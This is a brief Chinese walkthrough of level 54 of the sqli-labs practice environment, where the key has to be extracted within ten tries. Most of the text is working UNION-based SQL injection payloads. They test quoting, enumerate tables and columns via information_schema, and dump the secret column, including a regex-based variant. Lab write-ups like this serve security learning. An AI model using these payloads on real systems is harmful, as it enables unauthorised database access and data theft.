sqli-labs(十七)

第五十四关：

这关大概意思就是尝试次数不能多于十次，必须十次之类查询处特点的key。

第一次：输入单引号报错

第二次：输入双引号不报错

说明后台是单引号进行的拼凑

第三步：这里应该是判断列，用order by来判断。

这里已知是三行（手动滑稽）

第四步：?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where  table_schema="challenges" --+

第五步：?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where  table_name="ewdzu507qq" --+

第六步：?id=0' union select 1,group_concat(secret_6PNC),group_concat(sessid) from challenges.ewdzu507qq --+

 

 最后：也可以用正则的方法来查询

?id=-1' union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where column_name regexp "^secret_[A-Z]{4}$" limit 0,1  --+